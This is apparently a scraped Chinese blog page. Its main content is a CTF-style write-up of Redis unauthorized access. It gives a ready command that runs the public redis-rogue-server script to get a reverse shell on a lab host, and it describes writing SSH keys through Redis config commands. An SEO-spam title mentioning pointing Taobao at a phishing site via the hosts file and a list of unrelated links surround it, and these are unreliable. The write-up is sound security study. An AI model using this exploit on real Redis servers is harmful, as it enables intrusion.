当前位置: 首页 > wzjs >正文

更改host文件把淘宝指向自己做的钓鱼网站宠物论坛网站策划书

更改host文件把淘宝指向自己做的钓鱼网站,宠物论坛网站策划书,wordpress 标签小工具栏,官方网站建设思路目录 一、漏洞介绍 二、影响版本 三、漏洞复现 1.使用脚本 四、漏洞原理 一、漏洞介绍 Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下&#x…

目录

一、漏洞介绍

二、影响版本

三、漏洞复现

1.使用脚本

四、漏洞原理


一、漏洞介绍

Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到 0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据,还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器,从而导致可以直接进行ssh登录目标服务器。

二、影响版本

明确受影响版本 Redis<=5.0.5

但由于是配置不当导致的漏洞,所以高版本如果配置不当也可能导致

三、漏洞复现

1.使用脚本

使用github上一键利用的脚本:GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

python3 redis-rogue-server.py --rhost 192.168.57.143 --rport 40585 --lhost 192.168.57.128 

 这里选择反弹shell,用kali进行监听

成功得到flag

看到还有用写入ssh公钥的,但可能由于我们是docker环境,配置起来稍微要麻烦些,并且尝试了也没有成功。如果是直接部署在虚拟机中的应该会成功。

四、漏洞原理

(1)Redis 默认配置不启用密码认证,且默认监听0.0.0.0:6379,允许任意IP连接。所以我们可以直接通过redis-cli工具无密码连接到redis服务;

(2)同时,Redis提供config等敏感命令,攻击者可以通过这些命令写入恶意文件


http://www.dtcms.com/wzjs/831327.html

相关文章:

  • 网站推广软件哪家好网站建设就业方向
  • 网站运营名词解释手机网站生成app软件
  • php网站做ios哪些做海报比较好的网站
  • 阿里虚拟机建设网站在网上怎么做推广
  • 昆明pc网站建设html网站分页怎么做
  • 合肥建设网站制作哪个好电子政务 网站建设
  • 潍坊市建设局网站wordpress改成英文
  • 简约网站设计自动生成代码
  • 刚备案的域名如何做网站怎么用云服务器建设网站
  • 西安网站设计哪家公司好重庆网站建设的好处
  • 网店培训北京网站优化策略
  • 服装网站栏目调研太原网站建设推广
  • 无锡工程建设监察支队网站跳转国外ip的软件
  • 郑州哪家建设网站网址注册
  • 如何制作网站首页东港建站公司
  • 网站的建设与开发平果最新款手机
  • 电影模板哪个网站好视频网站中滑动列表怎么做
  • 经典企业网站站长平台怎么添加网站
  • 优惠券的网站怎么做的做网站建设优化的电话话术
  • 邢台企业做网站网站原型图怎么做
  • 软件开发和网站开发哪个更好手机网页设计尺寸
  • wordpress 基础建站wordpress附件上传云
  • 求个网站好人有好报百度贴吧英文网站建设怎么样
  • 网站开发接私单枣庄网站制作
  • 海报模板素材网站天元建设集团有限公司被山东高速收购了吗
  • 英文网站建设需要准备什么个人网站设计主题
  • 佛山做网站建设国际重大新闻事件2023
  • 北京网站开发网站建设报价网站查询ip地址查询
  • 怎样做婚恋网站正方教务管理系统入口
  • 网站建设公司生存现状wordpress 不兼容ie